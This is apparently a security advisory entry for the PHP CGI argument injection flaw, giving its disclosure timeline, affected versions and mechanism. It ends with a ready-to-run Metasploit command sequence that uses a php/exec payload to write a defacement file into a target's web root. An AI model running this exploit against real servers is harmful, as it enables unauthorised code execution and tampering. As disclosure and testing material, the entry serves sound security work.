Timeline :
Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13
Vulnerability reported to the vendor the 2012-01-17
Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03
Coordinated public release of the vulnerability the 2012-05-03
Metasploit PoC provided the 2012-05-04
PoC provided by :
egypt
hdm
Reference(s) :
Affected version(s) :
PHP versions before 5.3.12
PHP versions before 5.4.2
Tested on CentOS release 6.2 (Final) with :
php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012
Description :
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.”
Note : This vulnerability was potentially exploited in the wild for at least 8 years !
Commands :
use exploit/multi/http/php_cgi_arg_injection set RHOST 192.168.178.210 set TARGETURI /phpinfo.php set PAYLOAD php/exec set CMD echo \"owned\">/var/www/html/owned.html exploit